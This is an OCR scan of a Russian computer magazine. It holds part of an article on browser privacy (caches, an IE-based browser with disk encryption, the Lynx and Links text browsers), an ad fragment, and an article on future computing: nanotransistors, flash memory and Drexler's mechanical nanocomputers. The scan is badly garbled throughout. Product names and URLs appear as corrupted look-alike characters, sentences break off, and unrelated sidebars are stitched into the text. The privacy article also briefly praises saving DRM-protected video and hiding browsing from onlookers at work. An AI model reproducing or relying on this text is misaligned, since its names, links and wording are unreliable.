ходимые каждому пользователю» , то в Лисе 
все, что нужно, реализуется сразу, как только 
в этом возникает потребность или кого-то 
озаряет свежая идея. 

ОНеаІзеек 
0БЩ5Я Безопасность: 

В отличие от трех предыдущих, Неаізеек 
— это браузер, изначально ориентированный 



Но провал 



(щкою дао® 

ни и что? 






еакег.ги 



о назначении которых можно догадаться 
и без пояснений. Кэш целиком сосре- 
доточен в папке \Ооситепіз-п-Зеиіпдз\ 
изег-пате\І_осаІ ЗеиіпдзХАррІісаІіоп 
ОаІа\Мо2іІІа\РігеІох\РгоІіІез\случайный_ 
набор_букв_и_цифр.сІеіаиІІ.беІаиІІ\ 
СасНе и, как и все остальные браузеры, 
не всегда корректно очищается штатны- 
ми средствами. Что с ним делать, ты уже 
знаешь. 
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рс_гопе 



«ИЗ РІКЕРОХА МОЖНО СОТВОРИТЬ ВСЕ, 
ЧТО УГОДНО (ДАЖЕ СТОЛЬ СЕКСУАЛЬНОЕ), 
НО БЕЗОПАСНЕЕ ОТ ЭТОГО ОН НЕ БУДЕТ» 




> Подробнее о 
Неаізеек'е можно 
прочитать на страницах 
Википедии: ГіДр:// 
еп.ѵѵікіресііа.ога/ѵѵікі/ 
Неаізеек . 

> Браузеров на самом 
деле не 2 и не 3, а на- 
много больше. Полный 
список здесь: 
ГіДр://еп.ѵѵікіресІіа. 
ога/уѵікі/І_І5І оі ѵѵеЬ 
Ьгоѵѵзегз . 

> Сравнение браузе- 
ров по всевозможным 
характеристикам на 
ГіДр://еп.ѵѵікіресІіа. 
ога/ѵѵікі/Соппрапзоп оі 
ѵѵеЬ Ьгоѵѵзегз . 

> Для Рігеіох существует 
специальное расшире- 
ние, предоставляющее 
туже самую функ- 
циональность, что и 
Неаізеек ( Мрз://асІсІоп5. 
тогіІІа.огаЛігеІох/ІЗОб ). 
но никаким образом не 
связанное ни с ІЕ, ни с 
его дырами. Впрочем, 
как уже говорилось, 
уЛисаисвоихдыр 
предостаточно, спасает 
лишь его невысокая 
распространенность. 




на просмотр асіиіі-контента (и прочих сайтов сомнитель- 
ного содержания) и потому обладающий рядом несом- 
ненных преимуществ. Но, несмотря на привлекательные 
возможности (о которых ты прочитаешь ниже), он 
подвержен хакерским атакам почти так же, как и Іпіегпеі 
Ехріогег. И все потому, что нагло использует его движок 
(файл тзНітІ.сІІІ). 

Отсюда следуют две новости — плохая и очень плохая: 
во-первых, мы должны иметь ІЕ, установленный на своем 
компьютере; во-вторых, все атаки, которым подвержен 
ІЕ, автоматически распространяются и на Неаізеек, что 
делает его использование совсем не безопасным ! Поэ- 
тому обновляться (скачивать заплатки с МісгозоЙ ІІрсІаіе) 
следует как можно чаще. 

Компрометирующие данные: 

Я говорил о преимуществах. Во-первых, это мощная 
система шифрования, кодирующая всю информацию, 
записываемую на жесткий диск. Благодаря ней достига- 
ется полная приватность и конфиденциальность. Даже 
если жесткий диск попадет в руки спецслужб, без утюга 
и паяльника расшифровать его содержимое ни за что 
не удастся, а нам не придется каждый раз очищать кэш. 
Шифруется все: содержимое самих страниц, графи- 
ческие изображения, история, куки и даже закладки 
— ну разве не прелесть?! Однако следует помнить, что 
информация, физически проходящая через компьютер 
провайдера, равно как и маршрутизатор локальной сети, 
передается в незашифрованном виде. И если она кэ- 
шируется (а обычно она кэшируется), то может быть ис- 
пользована для компромата. Чтобы этого не произошло, 
необходимо использовать НДрз ргоху-сервера или даже 
более продвинутые защитные механизмы, о которых мы 
поговорим в другой раз. 

Хинты: 

Если занимаешься грязными делишками на работе, 
учебе или в публичных местах, то тебе очень кстати будет 
клавиша аварийной маскировки «Чем это вы тут занима- 
етесь?! » . Она вкупе с подавлением всех всплывающих 
окон и прочей гадости дает возможность наслаждаться 
страницами без риска быть пойманным, даже если за 



> Не веришь, что через 
браузер к тебе может 
проникнуть зараза? 
Смотри видеоролики на 
диске, что бы убедиться 
в этом окончательно. 



спиной то и дело шастают всякие любопытствующие. 
Попутно Неаізеек позволяет просматривать видеофайлы, 
защищенные ОМР (ОідііаІ Мападетепі РідНі — «Механизм 
контроля авторских прав»), сохраняя их на диске даже 
тогда, когда они этому всячески сопротивляются и во 
всех остальных браузерах не сохраняются. Более того, 
предусмотрена защита от всяких зловредных шпионских 
программ, стремящихся выведать о пользователе хоть 
какую-то информацию или подкинуть ему троянскую 
лошадь. Самое главное, что все это удовольствие не стоит 
ни копейки и может быть скачано с ѵѵѵѵѵѵ.ИеаІзеек.сот 
совершенно бесплатно, причем без всякого Абѵѵаге или 
другого замаскированного средства оплаты. 

О Текстовые браузеры 
0БЩ5Я Безопасность: 

Т екстовых браузеров существует огромное множество, но 
хороших всего 2. Один из них — классический І_упх, он же 
Рысь ( ИДр://Іѵпх.ізс.ога У выполненный в лучших традициях 
терминалов 60-х и редактора ѵі. Другой — «пижонский» 

І_іпкз ( ИДр^/Ііпкз.ЫЬпаИі.сот ) с псевдографическими окош- 
ками и меню, заставляющими вспомнить свою молодость, 
проведенную вместе с М8-003. Оба распространяются 
в исходных тестах и совершенно бесплатны. Несмотря на 
то что основной средой их обитания являются ІЛЧІХ-подоб- 
ные системы, в сети можно найти множество портов и под 
ѴѴіпбоѵѵз. Правда подавляющее большинство пользова- 
телей настолько привыкли к графическим браузерам, 
что даже и представить себе не могут, что, помимо них, 
существуют текстовые! И не только существуют, но еще 
и развиваются! Казалось бы, в наш век, когда 1 7-дюймовые 
мониторы стоят на каждом столе, а сайты без графики мож- 
но пересчитать по пальцам одной руки, текстовые браузеры 
должны были уже давно исчезнуть. Какой прок от страничек, 
если в них нет картинок?! Но вот, что я тебе скажу, — гра- 
фика (особенно в стиле современного ѵѵеЬ-дизайна) только 
затрудняет доступ к информации, рассеивает внимание 
и пожирает львиную долю трафика (причем совершенно 
зря). А текстовые браузеры могут дать то, что обыкновен- 
ным графическим собратьям и не снилось — ошелом- 
ляющий уровень безопасности. Будучи очень простыми 
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мегабайт). Он не привязан к определенному 
местоположению, ему безразличен реестр, 
поэтому для достижения максимальной 
секретности, его рекомендуется перебросить 
наІІазИ-брелок, чтобы не оставлять никаких 
следов на винте. 

Браузер Ыпкз (на самом деле еііпкз) в пос- 
ледних версиях РгееВЗО устанавливается 
основным текстовым браузером по умолчанию 
(до этого там был І_упх). Он поддерживает 
^ѵаЗсгірІ'ы и многие другие «усовершенс- 
твования» НТМІ_'а, игнорируемые Рысем, чем 
и объясняется рост его популярности. В зави- 
симости от своих настроек Ыпкз сохраняет кэш, 
куки и историю либо в текущей директории 
(именно текущей, а не своей собственной), 
либо в домашнем каталоге пользователя 
в папке .еііпкз. 

Хинты: 

Что еще может дать текстовый браузер? 
Во-первых, по сравнению с графическими 
браузерами скорость восприятия инфор- 



мации у него выше на 2 порядка. На экране 
виден только текст и больше ничего. Реклама 
вместе с сопутствующим ей информационным 
мусором уходит на дно. Во-вторых, изначаль- 
но рассчитанные на клавиатуру, текстовые 
браузеры демонстрируют непревзойденную 
скорость ѵѵеЬ-серфинга (как ни крути, на мыши 
все же меньше кнопок, чем на клавиатуре). 

И в-третьих, как показывает практика, при 
работе в текстовом режиме намного меньше 
устают глаза и можно безболезненно сидеть 
за монитором дни и ночи напролет без всякого 
ущерба для зрения. 



программами, текстовые браузеры по своей 
природе поддерживают минимум возможнос- 
тей НТМБ'аи не содержат фатальных ошибок, 
позволяя бродить по грязным закоулкам без 
риска подцепить сетевую заразу. 



О С презервативом или без 

Помимо выбора правильного браузера, необ- 
ходимо помнить и еще о некоторых вещах. На- 
пример, о кэше провайдера или виртуальных 
машинах: одно может выдать тебя с потрохами, 
другое — спасти в самых сложных ситуациях. 
Обо всем этом и многом другом ты прочитаешь 
во врезках. И-И 



Компрометирующие данные: 

Кэш страниц, история переходов со страницы 
на страницу и куки по умолчанию хранятся 
в том же каталоге, где расположен и сам 
Рысь (кстати, занимающий чуть больше двух 



> Содержимое индексного файла кэша ІЕ 
после его мнимой очистки. Воттаклюди и 
палятся... 



Работайте на 100% 



С легкостью решайте задачи 
которые ставит перед Вами 
высокотехнологичный мир 

с |1_агда $ирегі_іпе. 



оснащенным Т+овым 
двухъядерным процессором 
ІпсеІ® Соге™2 Оио. 
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ЮРИИ СВИДИНЕНКО 

МЕТАМОПРНЗѴАМВЕХ.ІШ 



МЕХАНИКА, 
КРЕМНИЙ 



1 — - 



ИЛИ КВАНТЫ? 



КОМПЬЮТЕРЫ БУДУЩЕГО — КАКИМИ ОНИ БУДУТ? 



В XIX ВЕКЕ НИКТО СЕРЬЕЗНО НЕ ЗАДАВАЛСЯ ТАКИМ ВОПРОСОМ, КАК МАТЕМАТИЧЕСКИЕ ВЫЧИСЛЕНИЯ НА МАШИНАХ. 
СОЗДАНИЕ ПЕРВОГО СЧЕТНОГО МЕХАНИЧЕСКОГО КОМПЬЮТЕРА ЛОРДОМ ЧАРЛЬЗОМ БЭББИДЖЕМ В 1834 ГОДУ РАЗ И НАВСЕГДА 
УБЕДИЛО ТОГДАШНИХ МАТЕМАТИКОВ В ТОМ, ЧТО ГОЛОВА - ХОРОШО, А МАШИНА - ЛУЧШЕ. ОДНАКО ТОГДА НИКТО И ПОДОЗРЕ- 
ВАТЬ НЕ МОГ, ЧТО УЖЕ ЧЕРЕЗ 150 ЛЕТ ПОЯВЯТСЯ МАШИНЫ ТАКОЙ ВЫЧИСЛИТЕЛЬНОЙ МОЩНОСТИ, ЧТО ЗА МИЛЛИСЕКУНДЫ БУ- 
ДУТ ПОЛУЧАТЬ ОТВЕТЫ НАЗАДАЧИ, РЕШАЕМЫЕ ОБЫЧНО АРМИЕЙ МАТЕМАТИКОВ СТАРОГО ОБРАЗЦА СО СЧЕТНЫМИ МАШИНАМИ 
НЕСКОЛЬКО ЛЕТ. ПРЕДСТАВЬ СЕБЕ: РАНЬШЕ БЫЛИ КОНТОРЫ, В КОТОРЫХ КЛЕРКИ С ПРОСТЫМИ АРИФМОМЕТРАМИ НАПЕРЕВЕС 
ЗА ОПРЕДЕЛЕННУЮ СУММУ НАЛИЧНЫХ ВРУЧНУЮ СЧИТАЛ И СЛОЖНЕЙШИЕ УРАВНЕНИЯ, ВЫПОЛНЯЯ ЗА МЕСЯЦЫ РАБОТУ, 

С КОТОРОЙ МАТСАР СПРАВЛЯЕТСЯ ЗА СЕКУНДУ-ДВЕ. САМО СОБОЙ, СЕГОДНЯ ИХ МЕСТО ЗАНЯЛ И ДЯДИ В БЕЛ ЫХ ХАЛ АТАХ, КОЛДУ- 
ЮЩИЕ ВОЗЛЕ СУПЕРКОМПЬЮТЕРОВ. ДЯДЯМ ПЛАТЯТ ДЕНЬГИ ВОЕННЫЕ, КЛИМАТОЛОГИ, МОЛ ЕКУЛЯРНЫЕ БИОЛОГИ, АСТРОНО- 
МЫ И ВООБЩЕ ВСЕ, КОМУ НЕОБХОДИМО ПОЛУЧИТЬ РЕШЕНИЕ ТИТАНИЧЕСКИХ ЗАДАЧ. 



ы жѳ повседневно используешь 
вычислительные мощности поско- 
ромнее и для более приземленных 
целей: кино посмотреть, музыку 
послушать, побродить в интернете или же 
поиграть. 

Г рубо говоря, по принципу действия современ- 
ные компьютеры не далеко ушли от механики 
Бэббиджа, но вот по развитию технологий 
ускакали довольно резво. И сегодня, когда 
виден свет в конце туннеля, предвещающий за- 
вершение миниатюризации и, как следствие, 
закона Мура, все более остро встает вопрос 
о будущем компьютеров и вычислительных 
систем вообще. Дело-то простое: нам нужны 
сверхбыстрые и компактные компьютеры. 
Всего-то! Дай современный ноут или КПК 
клерку из конца XIX века, он был бы безмерно 
счастлив, но нас-то это не устраивает, как 



клерка не устраивал его аппарат Бэббиджа. Но 
прошло время, в начале XX века шестеренки 
сменили быстрые электроны. Сегодня говорят, 
что через несколько десятков лет их место 
займут кванты или органика в виде молекул 
ДНК, а самые смелые заявляют об обратном 
переходе на шестеренки к середине XXI века. 
Как бы странно это не звучало, но правы все 
понемногу. Дело в том, что за всеми подобны- 
ми заявлениями стоят прототипы и годы фун- 
даментальных исследований (как и в XIX веке 
при исследовании электричества и создании 
благодаря полученным знаниям миллиардов 
устройств). 

Ты можешь спросить, почему же нельзя и 
дальше уменьшать размеры транзисторов или 
изобрести что-то покруче и поменьше? Ведь не 
зря Іпіеі и АІѴЮ за наши с тобой деньги двигают 
вперед технологии . 



□ Классика в строю 

А вот получается, что двигаться дальше 
практически некуда. То есть лет 10 — 20 у нас 
еще есть, а за ними в электронике последует 
полный застой (чего, естественно, не будет, 
так как вышеупомянутые Іпіеі и АІѴЮ опять- 
таки не зря тратят наши деньги на исследова- 
ния), если не искать альтернативные методы 
построения вычислительных систем. 

Закону Мура, как ни крути, уже исполнился 
41 год. Серьезная компьютерная гонка 
началась в 1965 году, когда сооснователь 
компании ІпіеІ Гордон Мур выдвинул прогноз, 
касающийся будущего развития микроэлек- 
троники. Он предположил, что количество 
транзисторов на чипах будет удваиваться 
каждый год. Т огда был повод для таких опти- 
мистических прогнозов. 

Во-первых, в то время чипы были еще очень 
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>Принцип действия и микрофотографии памяти ЫРАМ 



большими во всех отношениях. Как рас- 
сказывал мой преподаватель электроники, 
в то время они набирали триггеры (или в 
простонародье ключи) на полосе гетинакса 
размерами с обыкновенную линейку. И если 
кто мог разместить на ней 1 0 триггеров (из 
восьми получался один регистр, в котором 
можно было хранить 1 байт!), то это считалось 
круто. 

Мур же, опираясь на достижения тогдашнего 
производственного процесса, предположил, 
что такая тенденция не вечна. Он подумал, 
что можно будет увеличить размеры чипов 
и разместить на них больше ключей, а также 
уменьшить расстояние между отдельными 
транзисторами. 

Сегодня все эти задумки с успехом реализо- 
ваны в железе. Уже разработано производс- 
тво нанотранзисторов по 35-нм техпроцессу, 



и исследователи из ІВМ утверждают, что 
через пару лет приступят к освоению 
1 1 -нм техпроцесса. То есть на микросхемах 
размеры транзисторов будут не больше 
1 1 нанометров. Чтобы ты понял, насколько 
это мало, приведу пример: вдоль одного та- 
кого транзистора можно будет выстроить 1 00 
атомов кислорода. 

Однако 1 1 нанометров — это почти предел 
для традиционной плоской кремниевой 
наноэлектроники. После этой окончательной 
миниатюризации транзисторов закон Мура 
перестанет действовать на классическую 
электронику. Сам Мур недавно сказал: 



«Ничто не может длиться вечно, но пройдет 
еще 10 — 20 лет до того момента, когда мы 
столкнемся с фундаментальным барьером и 
нам придется что-то придумывать». 
Посмотрим теперь, как по времени разброса- 
ны переходы от 65-нм транзисторов, которые 



внедряются сегодня, к 1 1-нм. 

В 2007 году намечен переход на 45-нм 
процесс. 2009 год — внедрение 32-наномет- 
рового, и только в 201 1 году настанет черед 
технологического процесса 22 нм. А 1 1 -нм 
техпроцесс появится где-то к 2020 году после 
внедрения в 201 5 году 1 3-нм ноды. 

Эти прогнозы не высосаны из пальца, а 
заявлены Паоло Джар джини, директором 
технологической стратегии из корпорации 
Іпіеі. Более того, как он недавно сообщил, 
уже есть конкретные научно-технические 
разработки, которые позволяют реализовать 
эти долгоиграющие планы. 



В то время как ІпіеІ, ІВМ и АІѴЮ продолжают 
уверенно двигаться по протоптанной дороге 
к 1 1 -нм тупику, другие компании начинают 
искать альтернативу в виде трехмерных тран- 
зисторов, транзисторов на нанотрубках или 
вообще на отдельных молекулах. 

Так, Іпііпеоп Тесбпоіодіез предложили 
оригинальную конструкцию транзистора для 
чипов энергонезависимой памяти (попѵоіаіііе 
ТІазІл тетогу). Этот чип размерами всего 20 
нанометров (и это, заметь, не в 2015 году, а 
уже сегодня) может длительно хранить один 
бит без подачи на устройство энергии. 

Самая «продвинутая» современная НазН-па- 
мять, выполняющая аналогичные функции 
(хранение одного бита памяти), имеет размеры 
около 90 нм. Не мне тебе рассказывать, что 
такое ЯазН-память и где она используется :). 
Дело в том, что все попытки уменьшить 
ЯазН-чипы, использующие 90-нм технологию 
до сегодняшнего времени не увенчались 
успехом из-за физических ограничений, 
накладываемых процессом их производства. 
А Іпііпеоп’цам удалось создать новый 20-нм 
чип только благодаря ранее изобретенному 
полевому транзистору РіпРЕТ (РЕТ — Ріеіб 
Етіззіоп Тгапзізіог — полевой транзистор), 
который имеет трехмерную структуру распо- 
ложения слоев полупроводников, позволив- 
шую уменьшить его размеры. Современные 
транзисторы — «плоские», и из-за такой 
геометрии трудно добиться большей мини- 
атюризации. Один из главных компонентов 
транзистора — кремниевый «плавник» (Тіп) 
толщиной всего 8 нанометров, который 
проходит через нитридный слой, играющий 
роль «ловушки» для носителей информа- 
ции — электронов. Затвор транзистора 
размерами 20 нм управляет «плавником», 
который обеспечивает переключение 
«ловушечного слоя». Транзистор сконс- 
труирован таким образом, что «ловушеч- 
ный слой» электрически изолирован от 
«плавника» и затвора. В логическом состо- 



НАНОТЕХНОЛОГИЧЕСКАЯ КОМПАНИЯ ЫАЫТЕР0, СПЕЦИАЛИЗИ- 
РУЮЩАЯСЯ НА ИЗГОТОВЛЕНИИ МОЛЕКУЛЯРНОЙ ПАМЯТИ НА ОСНОВЕ 
НАНОТЕХНОЛОГИЙ, И КОМПАНИЯ 1.51 Ю6ІС, ЛИДЕР В ПРОИЗВОДСТВЕ 
СПЕЦИАЛИЗИР0ВАННЫХМИКР0ЧИП0В, НЕДАВНО АНОНСИРОВАЛИ 
ГОТОВНОСТЬ К НАЧАЛУ ПРОИЗВОДСТВА НАНОПАМЯТИ ЫРАМ. ЭТО 
СТАЛО ВОЗМОЖНО БЛАГОДАРЯ НОВОЙ ТЕХНОЛОГИИ РАЗДЕЛЕНИЯ И 
НАНЕСЕНИЯ НАН0ТРУБ0К НА ПОВЕРХНОСТИ ЧИПОВ. 

НОВАЯ ПРОИЗВОДСТВЕННАЯ ЛИНИЯ ПРЕДСТАВЛЯЕТ СОБОЙ СТАН- 
ДАРТНУЮ ПОЛУПРОВОДНИКОВУЮ, НОС НЕБОЛЬШИМИ ДОПОЛНЕ- 
НИЯМИ, СВЯЗАННЫМИ С ТЕХНОЛОГИЕЙ ЫАЫТЕРО. ПРОИЗВОДИТЬ 
ЛИНИЯ БУДЕТ ЫРАМ — РАМ-НАНОПАМЯТЬ С ВЫСОКОЙ ПЛОТНОСТЬЮ 
ДАННЫХ. КАК УТВЕРЖДАЮТ АНАЛИТИКИ ОБЕИХ КОМПАНИЙ, В БЛИ- 
ЖАЙШЕМ БУДУЩЕМ НОВАЯ НАНОПАМЯТЬ ЗАМЕНИТ ВСЕ СУЩЕСТВУ- 
ЮЩИЕ ВИДЫ РАМ-ПАМЯТИ. 

ПАМЯТЬ ЫРАМ ИСПОЛЬЗУЕТ НАНОТРУБКИ, КОТОРЫЕ ДО ЭТОГО 
ВРЕМЕНИ БЫЛО ДОСТАТОЧНО СЛОЖНО И ДОРОГО ПРОИЗВЕСТИ. НО 
БЛАГОДАРЯ ТОМУ, ЧТО КОМПАНИЯ ЫАЫТЕРА РАЗРАБОТАЛА НОВЫЙ 
МЕТОД ОЧИЩЕНИЯ УГЛЕРОДНЫХ НАНОТРУБОК И ТЕХНОЛОГИЮ ИХ 
МАССОВОГО НАНЕСЕНИЯ НАЧИП, ПРОИЗВОДСТВО N РАМ-ЧИПОВ СТА- 
ЛО РЕАЛЬНОСТЬЮ. 
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янии, соответствующем «1», в «ловушку» 
попадает около 1 00 электронов. В совре- 
менных чипах ячейка памяти в состоянии « 1 >= 
содержит их около 1 000. 

Еще в 2004 году специалисты Іпііпеоп пред- 
ставили на Международной Конференции по 
электронным устройствам в Сан-Франциско 
новый ЯазН-чип, который может хранить до 
32 Гб информации, при этом он в 8 раз мень- 
ше продающихся сегодня. 

Если нельзя сделать чип меньше, то ничто 



Как было установлено учеными, время пере- 
ключения нанотранзисторов выше аналогич- 
ного показателя у транзисторов, состоящих 
из нанотрубок. И, естественно, оно выше, чем 
у любых современных МОЗРЕТ-транзисторов. 
Среди нестандартных проектов, заставля- 
ющих компьютеры работать еще быстрее, 

— использование вместо винчестера той 
же ЯазН-памяти. Идея интересная, если 
учитывать то, что чем меньше будет «боль- 
шой» механики в компе, тем лучше. Один мой 



ФИЗИКИ ИЗ УНИВЕРСИТЕТА АРИЗОНЫ РАЗРАБОТАЛИ ТРАНЗИС- 
ТОР, СОСТОЯЩИЙ ИЗ ОДИНОЧНОЙ МОЛЕКУЛЫ. НОВЫЙ НАНОТРАН- 
ЗИСТОР РАБОТАЕТ БЛАГОДАРЯ ЭФФЕКТУ КВАНТОВОЙ ИНТЕРФЕРЕН- 
ЦИИ, ПОЭТОМУ ОН БЫЛ НАЗВАН 0ШЕТ — СНІАЫТІІМ ШТЕКРЕРЕЫСЕ 
ЕРРЕСТ ТПАЫ5І5Т0Р. НОВЫЙ НАНОТРАНЗИСТОР ОШЕТ ДЛИНОЙ ВСЕГО 
ОДИН НАНОМЕТР. МЕНЬШЕГО ПО РАЗМЕРАМ НАН0ТРАНЗИСТ0РАД0 
СИХ ПОРУЧЕНЫМ ИЗГОТОВИТЬ НЕ УДАВАЛОСЬ. 

БЛАГОДАРЯ ПРИНЦИПАМ КВАНТОВОЙ МЕХАНИКИ, НА КОТОРЫХ 
ОСНОВАНА РАБОТА ОШЕТ, ЕГО ПЕРЕКЛЮЧЕНИЕ ПРОИСХОДИТ КОНТ- 
РОЛИРОВАНИЕМ РАЗЛИЧНЫХ ЭЛЕКТРОННЫХ ПОТОКОВ, ПРОХОДЯ- 
ЩИХЧЕРЕЗ НЕГО. 0СН0ВАТРАНЗИСТ0РА— КОЛЬЦЕВАЯ МОЛЕКУЛА 
БЕНЗОЛАС ДВУМЯ ПОДКЛЮЧЕННЫМИ К НЕЙ ЭЛЕКТРОДАМИ, ПО 
КОТОРЫМ ЧЕРЕЗ ТРАНЗИСТОР ПРОТЕКАЕТ ОСНОВНОЙ ТОК. ТОК, 
ПРОТЕКАЮЩИЙ ПОТРЕТЬЕМУЭЛЕКТРОДУ.НЕСКЛАДЫВАЕТСЯ С 
ОСНОВНЫМ, КАК ЭТО ПОЛОЖЕНО ПО ЗАКОНАМ ЭЛЕКТРОДИНАМИКИ, 
А ВЕДЕТ СЕБЯ КАК ВОЛНА, И ПОЭТОМУ 2 ТОКА МОГУТ ИНТЕРФЕРИРО- 
ВАТЬ МЕЖДУ СОБОЙ ТАКИМ ОБРАЗОМ, ЧТО ТРАНЗИСТОР ЗАКРЫВАЕТ- 
СЯ. ОПИСЫВАЕМЫЕ ИССЛЕДОВАТЕЛЯМИ ПЕРСПЕКТИВЫ РАЗВИТИЯ 
КОМПЬЮТЕРОВ НА КВАНТ0ВЫХТРАНЗИСТ0РАХ ОШЕТ ДОСТАТОЧНО 
ШИРОКО ОХВАТЫВАЮТ МИКРОЭЛЕКТРОННУЮ ИНДУСТРИЮ. ЭТО И 
КОМПЬЮТЕРНЫЕ ЧИПЫ, И МОБИЛЬНЫЕУСТРОЙСТВА, И БЫТОВАЯ 
ЭЛЕКТРОНИКА — ВСЕТИПЫ ПРОДУКТОВ, ГДЕ ТОЛЬКО ИСПОЛЬЗУЮТ- 
СЯ ТРАНЗИСТОРЫ. 



не мешает сделать его быстрее. Ученые из 
Г арвардского университета славно потру- 
дились над оптимизацией скорости транзис- 
торов. Они разработали самый быстрый на 
сегодняшний день нанотранзистор на основе 
нанострун. 

Он состоит из германиево/кремниевого ядра 
и кремниевых нанострун, которые формиру- 
ют структуру «ядро-нити» в Ое/Зі нанострук- 
туре с надежными омическими контактами и 
высокой мобильностью носителей зарядов. 
Их Ое/Зі нанострунный РЕТ (полевой тран- 
зистор) в 3-4 раза быстрее, современных 
кремниевых СМОЗ. 
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друг поставил себе вместо винта две планки 
памяти по 1 Гб и установил на них винду. 

Ему пришлось подцепить на них отдельное 
автономное питание. Но зато как работала 
на них винда! Примерно то же, только более 
быстрое, предлагают нам на основе памяти 
: {[азН-ЫАЖ. 

Уже есть винчестеры с интегрированными 
64 Мб или 1 28 Мб буферной ііазб-памяти. А 
в 2007 году ЫАЫ 0-винчестеры появятся на 
рынке. 

Новая ЫАЖ-технология была названа МСР 

— МиШ-сЫр Раскаде Метогу. Ее массовое 
производство началось в прошлом месяце. 
Как видишь, классическая электроника пока 
не собирается склеивать ласты, хотя этот 
процесс уже не за горами. Поэтому, кроме 
классических ухищрений, ученые ищут не 
классические. 

□ Механические нанокомпьютеры 

Одно из таких не классических ухищрений 

— возврат к механике старины Бэббиджа. 
Оказывается, что в физике наномира есть 
несколько ограничений для работы сверх- 
малой электроники. Одно из них — законы 
квантовой механики, которые не дают 
работать нанотранзисторам как надо. А вот 
механика работает достаточно надежно. 
Эрик Дрекслер, один из отцов нанотехноло- 
гии, даже разработал проект механического 
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нанотранзистора на стержневой логике. 
Основными элементами как механопамяти, 
так и транзисторов являются вдвигаемые и 
выдвигаемые стержни, взаимно запирающие 
движение друг друга. 

Получается, что при ширине стержня в 
несколько атомных размеров (например, 
при использовании углеродных нанотрубок) 
компьютер, эквивалентный современному, 
содержащему 1 млн. транзисторов, может 
иметь объём 0,01 кубических микрон, а ком- 
пьютер с памятью в 1 терабайт — 1 кубичес- 
кий микрон! 

Как и в случае с наноэлектроникой, быстро- 
действие наномеханического компьютера 
будет определяться возможностью отвода 
тепла. Расчёты Дрекслера показывают, что 
при комнатной температуре окружающей 
среды на 1 Вт рассеиваемой мощности такой 
компьютер будет осуществлять около 1 0Е1 6 
операций в секунду. При мощности 1 00 нВт 
это даёт производительность 1 0Е9 операций 
в секунду, что примерно эквивалентно совре- 
менному мощному настольному компьютеру. 
Но только в объеме 1 кубический микрон ! Для 
сравнения: красная кровяная клетка — эрит- 
роцит — имеет средний объем порядка 60 
кубических микрон. Получается, в эритроцит, 
который и в оптический микроскоп-то плохо 
видно, можно будет напихать 60 средних 
настольных компьютеров! 

>Чип памяти ЛазН-МАМБ Затзипд №N0 
0пе4 Гб 



Не хуже дела обстоят и с механической памя- 
тью. Несмотря на то что при словах «механи- 
ческая память» вспоминается старые счетные 
машины, арифмометры, «железные фелик- 
сы» и перфокарты, этот тип наномеханики 
не предполагает возврата к перфокартам. 

Над механическими ячейками памяти ученые 
работают с 2000 года. Например, в Бостонс- 
ком университете ученый Притирэй Моханти 
создал систему хранения информации на 
основе наномеханических осцилляторов (ко- 



лебательных струн). Эти механические ячейки 
памяти — из кремния, которые в тысячу раз 
меньше диаметра человеческого волоса. 
Использование механопамяти для хранения 
информации будет выгоднее по плотности 
информации, чем применение современных 
электромагнитных систем. Ученые уверены, 
что механопамять обгонит по емкости даже те 
магнитные устройства, которые по нынешним 
технологиям изготовления приближаются к 
физическому пределу плотности информации. 



ИССЛЕДОВАТЕЛЯМ ИЗ ЯПОНСКОГО НАЦИОНАЛЬНОГО ИНСТИТУТА 
МАТЕРИАЛОВЕДЕНИЯ УДАЛОСЬ ПЕРЕНЕСТИ СТАРУЮ ТЕХНОЛОГИЮ 
МЕХАНОЭЛЕКТРИЧЕСКИХ ВЫКЛЮЧАТЕЛЕЙ НА КВАНТОВЫЙ УРО- 
ВЕНЬ. ОНИ СОЗДАЛИ МИНИАТЮРНЫЙ КВАНТОВО-МЕХАНИЧЕСКИЙ 
ВЫКЛЮЧАТЕЛЬ, ПОДОБНЫЙ ТЕМ, КОТОРЫЕ ПО СЕЙ ДЕНЬ ИСПОЛЬЗУ- 
ЮТСЯ ВО МНОГИХ БЫТОВЫХ ПРИБОРАХ. 

ПРИНЦИП РАБОТЫ ВЫКЛЮЧАТЕЛЯ ПРОСТ: ПРИ ПОДАЧЕ НАПРЯЖЕ- 
НИЯ НА УСТРОЙСТВО МЕЖДУ ДВУМЯ НАНОПРОВОДНИКАМИ ВОЗНИ- 
КАЕТ ИЛИ РАСПАДАЕТСЯ МОСТИК ИЗ СЕРЕБРА, КОТОРЫЙ ВЫПОЛНЯЕТ 
РОЛЬПРОВОДНИКА.ДЛИНАМОСТИКА, ПО КОТОРОМУ ПРОТЕКАЕТ ТОК, 
— ВСЕГ0 1 НАНОМЕТР. НА ОТРЕЗКЕ ДЛИНОЙ 1 НАНОМЕТР МОЖНО РАС- 
ПОЛОЖИЛО АТОМОВ ВОДОРОДА. ПОЭТОМУ СООБЩЕНИЕ О СОЗДА- 
НИИ НОВОГО КВАНТОВОГО УСТРОЙСТВА ПРЕТЕНДУЕТ НА СЕНСАЦИЮ. 

В ОТЛИЧИЕ ОТ ОБЫЧНЫХ МЕХАНОЭЛЕКТРИЧЕСКИХ ПЕРЕКЛЮЧАТЕ- 
ЛЕЙ, У НАНОАНАЛОГА НЕТ ДВИЖУЩИХСЯ МЕХАНИЧЕСКИХ ЧАСТЕЙ. 
ПЕРЕМЫЧКА ИЗ СЕРЕБРА ВОЗНИКАЕТ МЕЖДУ ШИНАМИ ПРОСТО ОТ 
ПОДАЧИ НА НИХ НАПРЯЖЕНИЯ. ПРОТОТИП, ИЗГОТОВЛЕННЫЙ УЧЕ- 
НЫМИ, ПЕРЕКЛЮЧАЕТСЯ С ЧАСТОТОЙ ОКОЛ0 1 МГЦ ПРИ РАЗНИЦЕ 
ПОТЕНЦИАЛОВ МЕЖДУ ШИНАМИ ±600 МИЛЛИВОЛЬТ. 

ТО, ЧТО НОВОЕ УСТРОЙСТВО РАБОТАЕТ ПО ЗАКОНАМ КВАНТОВОЙ 
ФИЗИКИ, ПОЗВОЛЯЕТ СОЗДАВАТЬ НА ЕГО ОСНОВЕ МНОГОБИТНУЮ 
ПАМЯТЬ. 




Механопамять может работать, выполняя 
миллионы и миллиарды циклов в секунду, 
потребляя при этом в миллион раз меньше 
энергии, чем электронные аналоги. Связано 
это с тем, что механике не нужно рассеивать 
так много тепла, как электронике. 

Одиночная ячейка памяти состоит из кремние- 
вой струны нанометровых размеров, которая 
при воздействии на ее концы высокочастот- 
ным напряжением (с частотой в несколько 
мегагерц) изгибается. При определенной 
амплитуде напряжения струна принимает 
одно из конечных состояний (« 1 » или «О» со- 
ответственно), что как раз нужно для хранения 
информации. 



хим 
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> Отдельный кантилевер «многоножки» 



